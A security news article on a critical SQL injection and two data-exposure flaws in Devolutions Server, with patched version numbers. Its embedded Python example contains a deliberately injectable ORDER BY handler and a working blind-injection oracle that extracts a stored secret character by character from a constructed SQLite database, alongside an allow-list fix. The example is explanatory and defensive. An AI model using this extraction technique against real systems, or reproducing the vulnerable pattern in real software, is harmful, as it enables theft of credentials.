Devolutions Server Hit by SQL Injection Flaw Allowing Data Theft

A critical security vulnerability has been discovered in Devolutions Server, a popular centralized password and privileged access management solution.

The flaw, rated critical (CVSS 9.4), could allow an authenticated attacker to steal sensitive data or modify internal records.

Devolutions, the company behind the software, released a security advisory (DEVO-2025-0018) on November 27, 2025, detailing three separate issues.

The most dangerous of these is a SQL injection vulnerability in the server's handling of its "last usage logs" feature.

The Critical Risk: SQL Injection

The most urgent issue is tracked as CVE-2025-13757. It carries a CVSS score of 9.4 out of 10, which places it in the Critical band.

CVE ID           Severity   CVSS score   Description
CVE-2025-13757   Critical   9.4          SQL Injection
CVE-2025-13758   Medium     5.1          Data Exposure
CVE-2025-13765   Medium     4.9          Improper Access

This vulnerability occurs in the "last usage logs" section of the software. Specifically, the flaw exists in a parameter called DateSortField.

When a user interacts with this feature, the value of that parameter is passed into the database query without proper validation.

Because of this missing check, a user who is already logged into the system (an "authenticated user") can alter the query the server runs and read data the query was never meant to return.

In a worst-case scenario, this allows a bad actor to exfiltrate (steal) confidential data or even change data stored on the server.

Since Devolutions Server stores passwords and access keys, the ability to steal this data poses a significant security risk to organizations.
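To show the mechanism at work, here is an added example that is not Devolutions' code; the schema, table names, column names and secret value are constructed for illustration, and the advisory does not describe the server's internal query. A sort column cannot be passed as a bound query parameter, so servers often splice it straight into the ORDER BY clause. An authenticated user who controls that string can wrap it in a CASE expression and use the resulting row order as a yes/no oracle to read data from other tables one character at a time, without ever seeing an error or an extra row. The fixed variant maps the user-supplied field name through an allow-list and refuses anything else.

```python
import sqlite3

# Constructed sample schema and data for the example; not the real product schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE usage_logs (id INTEGER PRIMARY KEY, entry TEXT, used_at TEXT);
        CREATE TABLE credentials (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
        INSERT INTO usage_logs VALUES
            (1, 'vpn', '2025-11-01'), (2, 'db', '2025-11-02'), (3, 'mail', '2025-11-03');
        INSERT INTO credentials VALUES (1, 'svc-backup', 'hunter2');
    """)
    return conn


def list_logs_vulnerable(conn, sort_field):
    # Hypothetical bug pattern: the caller-supplied sort field is concatenated
    # into the statement, so it can carry arbitrary SQL expressions.
    sql = f"SELECT id, entry, used_at FROM usage_logs ORDER BY {sort_field}"
    return [row[0] for row in conn.execute(sql)]


# Allow-list: external field names mapped to the only columns sorting may use.
ALLOWED_SORT_FIELDS = {"id": "id", "entry": "entry", "used_at": "used_at"}


def list_logs_fixed(conn, sort_field, descending=False):
    # Hardened form: the user value selects a known column; it is never spliced in.
    column = ALLOWED_SORT_FIELDS.get(sort_field)
    if column is None:
        raise ValueError(f"unsupported sort field: {sort_field!r}")
    direction = "DESC" if descending else "ASC"
    sql = f"SELECT id, entry, used_at FROM usage_logs ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, sort_field):
    # True when the hardened handler refuses the supplied sort field.
    try:
        list_logs_fixed(conn, sort_field)
    except ValueError:
        return True
    return False


def oracle(conn, condition):
    # Boolean oracle against the vulnerable handler: when `condition` is true the
    # rows come back in descending id order, otherwise ascending. No row content
    # from the other table is ever returned; only the ordering leaks.
    payload = f"(CASE WHEN ({condition}) THEN -id ELSE id END)"
    return list_logs_vulnerable(conn, payload) == [3, 2, 1]


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_secret(conn, max_len=16):
    # Recover credentials.secret one character at a time via the ordering oracle.
    # substr() in SQLite is 1-based; an empty result marks the end of the string.
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = f"(SELECT substr(secret,{pos},1) FROM credentials WHERE id=1) = '{ch}'"
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", extract_secret(db))
    print("hardened handler rejects payload:",
          is_rejected(db, "(CASE WHEN 1=1 THEN -id ELSE id END)"))
```

The injected expression changes only the order of rows the user is already allowed to see, which is why this class of flaw is easy to miss in testing: every response looks legitimate, yet each request answers one question about a value the query should never touch. The allow-list also handles the direction flag as a separate boolean rather than accepting "ASC"/"DESC" text from the client, so nothing user-controlled reaches the SQL string.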

Two Additional Flaws Found

Alongside the critical flaw, researchers from DCIT a.s. (credited as JaGoTu) discovered two “Medium” severity issues:

  1. Leaked Passwords (CVE-2025-13758): Normally, when the server lists entries, it should only send basic info like names or usernames. Passwords are supposed to be sent separately only when requested. However, a bug caused some passwords to be included in that first general request, exposing them unnecessarily.
  2. Email Service Access (CVE-2025-13765): This flaw involves the email settings configuration. It allowed users without administrative rights to view passwords for configured email services, which should be restricted to admins only.

System administrators are urged to patch their software immediately. The vulnerabilities affect Devolutions Server versions 2025.2.20 and earlier, as well as 2025.3.8 and earlier.

To fix these security holes, organizations must upgrade to:

  • Version 2025.2.21 (or higher)
  • Version 2025.3.9 (or higher)

These updates validate the sort parameter before the database query is built and stop returning credentials in responses where they do not belong, closing the door on the attacks described above.
